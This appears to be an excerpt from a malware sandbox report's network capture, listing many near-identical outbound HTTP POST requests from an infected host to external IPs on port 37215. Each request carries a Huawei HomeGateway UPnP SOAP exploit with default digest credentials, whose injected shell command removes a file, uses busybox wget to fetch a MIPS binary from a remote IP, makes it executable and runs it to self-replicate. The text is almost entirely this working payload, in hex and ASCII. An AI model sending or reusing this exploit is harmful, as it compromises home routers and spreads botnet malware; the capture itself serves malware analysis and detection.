                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        863192.168.2.233498441.140.99.14437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489201069 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        864192.168.2.2351068157.117.88.17737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489236116 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        865192.168.2.2350312106.214.111.19637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489243031 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        866192.168.2.235658041.202.149.14637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489337921 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        867192.168.2.2360906157.0.68.8137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489337921 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        868192.168.2.235008041.23.1.337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489339113 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        869192.168.2.2356670197.76.62.5337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489342928 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        870192.168.2.233415841.32.71.12437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489393950 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        871192.168.2.233816641.126.31.21437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489396095 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        872192.168.2.234921041.159.202.13637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489408970 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
